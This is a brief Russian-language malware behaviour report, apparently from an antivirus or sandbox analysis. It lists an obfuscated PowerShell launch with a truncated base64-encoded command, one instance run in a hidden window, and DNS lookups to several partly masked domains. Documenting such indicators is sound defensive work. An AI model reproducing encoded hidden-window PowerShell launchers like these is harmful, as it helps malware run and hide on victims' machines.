Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAARwB2AHgAcgBrAGsAZAB2AHoAbwAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBMAGQAYgBqAHYAcgBiAHkAeQB5AHkAaQBlACAAIwA+ACAAJABKAGcAagBiAGQAawB0AHkAPQAnAEoAdQ...
- DNS ASK ma#####monkeymedia.com
- DNS ASK ta####osmetics.com
- DNS ASK sh##.#odaiaodai.com
- DNS ASK lo##.org
- DNS ASK pl#####oupnursery.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAARwB2AHgAcgBrAGsAZAB2AHoAbwAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBMAGQAYgBqAHYAcgBiAHkAeQB5AHkAaQBlACAAIwA+ACAAJABKAGcAagBiAGQAawB0AHkAPQAnAEoAdQ...' (со скрытым окном)